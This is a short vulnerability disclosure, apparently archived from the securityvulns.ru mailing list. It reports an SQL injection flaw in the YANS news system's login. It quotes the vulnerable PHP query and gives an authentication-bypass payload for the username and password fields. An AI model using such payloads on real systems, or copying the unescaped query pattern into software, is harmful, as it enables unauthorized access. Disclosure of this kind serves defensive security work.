Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  gtcatalog <= 0.9.1 (index.php) Remote File Include Vulnerability

  LetterIt v2 (inc/session.
php) Remote File Include Vulnerability

  [Full-disclosure] RSS Injection in Sage part 2

  FreeWebshop <=2.2.2 [local file include & xss]

From:navairum_(at)_gmail.com <navairum_(at)_gmail.com>
Date:09.11.2006
Subject:Y.A.N.S sql injection

Product: YANS (yet another news system)
Link: http://sourceforge.net/projects/yans/

vuln code:
$resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error());
       
simple sql injection
' or '1=1
' or '1=1

-navairum

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru